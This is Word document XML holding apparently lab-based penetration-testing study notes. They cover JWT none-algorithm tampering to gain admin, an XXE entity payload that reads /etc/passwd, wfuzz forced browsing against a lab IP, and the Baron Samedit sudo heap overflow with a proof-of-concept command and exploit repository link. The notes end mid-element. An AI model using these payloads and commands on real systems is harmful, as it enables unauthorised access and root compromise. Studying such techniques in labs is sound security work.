    <w:p w14:paraId="398B12E0" w14:textId="36B41E96" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change the role to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37063576" w14:textId="266B30E8" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>need second . to denote signature even if none is present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793FF52A" w14:textId="4440BE5B" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D39317" w14:textId="2FCBE2C1" w:rsidR="00070C4C" w:rsidRDefault="00F87817" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use TokenBreaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC6C7D3" w14:textId="2F779C0A" w:rsidR="00F87817" w:rsidRDefault="00F87817" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>TheNone.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA095F" w14:textId="5C71CD63" w:rsidR="00F87817" w:rsidRDefault="00F87817" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy body payload and change user to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1255C" w14:textId="19675A86" w:rsidR="00F87817" w:rsidRDefault="00F87817" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XXE – Intro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C9805" w14:textId="6663EF78" w:rsidR="00F87817" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker can use ENTITY feature of XML to load resources from outside the website directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E6B134" w14:textId="4FFEC9FB" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>like load /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9784F0" w14:textId="62D1F4F6" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>php expect module to get RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF792E" w14:textId="4E3C57F0" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>expect://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C067012" w14:textId="4D8EA8B0" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>module is not always a guarantee install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21084A1F" w14:textId="69DE5500" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>XXE – Manual Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FBE4A" w14:textId="656DC262" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>examine input in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7119A" w14:textId="42619588" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view bottom of POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B263BD" w14:textId="2DEF25C7" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?xml&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89041B" w14:textId="2C6BB64A" w:rsidR="00E812AA" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view top of POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CF6D2" w14:textId="14AA3E0F" w:rsidR="00E812AA" w:rsidRPr="000212CE" w:rsidRDefault="00E812AA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B8B6E" w14:textId="6B5828BC" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">input such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidRPr="00F13BC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E0F81C1" w14:textId="27C29B2A" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidRPr="00F13BC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> &gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC76422" w14:textId="2E0F163D" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find users and their privilege levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D4F542" w14:textId="7161F52D" w:rsidR="000212CE" w:rsidRDefault="00535861" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Forced Browsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607BE33" w14:textId="18EDCF4F" w:rsidR="00535861" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>using logic to find resources on website that are not normally accessible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26117F20" w14:textId="54A5BF40" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wfuzz on url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6E82B" w14:textId="26D832D8" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidRPr="00F13BC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/user1/note.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> --&gt; change user1 to user2 for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F235EEF" w14:textId="4860A1FC" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try admin names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E332B65" w14:textId="1D414E17" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Forced Browsing – Automatic Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5D89C5" w14:textId="2690E06C" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wfuxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE66E7" w14:textId="2B76A641" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pip3 install wfuzz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D4CC21" w14:textId="6C6E2A9D" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965C258" w14:textId="0845AD4F" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-c – output in color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74166DA9" w14:textId="4A06756F" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-z – what will replace FUZZ in request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D40F11" w14:textId="4ECBF91D" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>file,/path/file.ext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5004AA69" w14:textId="276A9CF5" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -hc – don’t show certain http response codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40143ABF" w14:textId="7546EEB9" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -hl – don’t show certain amount of lines in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D411A48" w14:textId="780406C6" w:rsidR="001976D5" w:rsidRDefault="001976D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -hh – don’t show a certain amount of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84D6E9" w14:textId="01C04343" w:rsidR="001976D5" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>when there isn’t a target, itll return a Word count denoting error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E11950" w14:textId="43230E20" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hide that amount to remove error returns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1A85C" w14:textId="4A51FE59" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -sw – shows specific amount of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697690F" w14:textId="1D637F68" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="006345CF">
        <w:t>wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hw 57 10.10.155.24:81/FUZZ/note.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1B807E" w14:textId="27EDFA91" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>API Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB25A86" w14:textId="28F24583" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>search for api.php page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716175CC" w14:textId="2163F169" w:rsidR="00F626E7" w:rsidRDefault="00F626E7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>api directory in source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5FA72C" w14:textId="626677AB" w:rsidR="006814EE" w:rsidRDefault="006814EE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ports open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B669A" w14:textId="413A7921" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dirsearching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45CF6F" w14:textId="53E4E768" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cmd parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E53CE" w14:textId="4FFBE3AF" w:rsidR="006345CF" w:rsidRDefault="006345CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A8732" w14:textId="2CFCCFD9" w:rsidR="003143EB" w:rsidRDefault="003143EB" w:rsidP="003143EB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE75EED" w14:textId="56C68D95" w:rsidR="003143EB" w:rsidRDefault="00F80AAF" w:rsidP="003143EB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>BARON SAMEDIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A327296" w14:textId="1D0CF012" w:rsidR="00F80AAF" w:rsidRDefault="00F80AAF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unix Sudo Program Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462A2C1" w14:textId="1FA5929A" w:rsidR="00F80AAF" w:rsidRDefault="00F80AAF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>works with default settings, regardless of sudo permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF5DD56" w14:textId="1618C15C" w:rsidR="00F80AAF" w:rsidRDefault="00F80AAF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>affects unpatched sudo programs from 1.8.2-1.8.32p2 and 1.9.0-1.9.5p1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE9D58" w14:textId="4376B745" w:rsidR="00451AAA" w:rsidRDefault="00451AAA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>buffer overflow in sudo program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6199A0" w14:textId="59137187" w:rsidR="00451AAA" w:rsidRDefault="00451AAA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>heap buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F723AE" w14:textId="49D28306" w:rsidR="00451AAA" w:rsidRDefault="00451AAA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF9645C" w14:textId="4FDD1C76" w:rsidR="00451AAA" w:rsidRDefault="00451AAA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00451AAA">
        <w:t>sudoedit -s '\' $(python3 -c 'print("A"*1000)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099B5FA" w14:textId="09F60708" w:rsidR="00451AAA" w:rsidRDefault="00451AAA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if system is vulnerable, overwrite the heap buffer and crash the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E786339" w14:textId="0D541812" w:rsidR="00451AAA" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidR="00451AAA" w:rsidRPr="00F13BC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/blasty/CVE-2021-3156</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="253D7F6A" w14:textId="398ED8CE" w:rsidR="00451AAA" w:rsidRDefault="009D64C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>once exploit is on victim computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820359F" w14:textId="5210C017" w:rsidR="009D64C0" w:rsidRDefault="009D64C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A62644" w14:textId="7ADD724B" w:rsidR="009D64C0" w:rsidRDefault="009D64C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo-hax-me-a-sandwich executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7693E5" w14:textId="7CAF5A77" w:rsidR="009D64C0" w:rsidRDefault="009D64C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
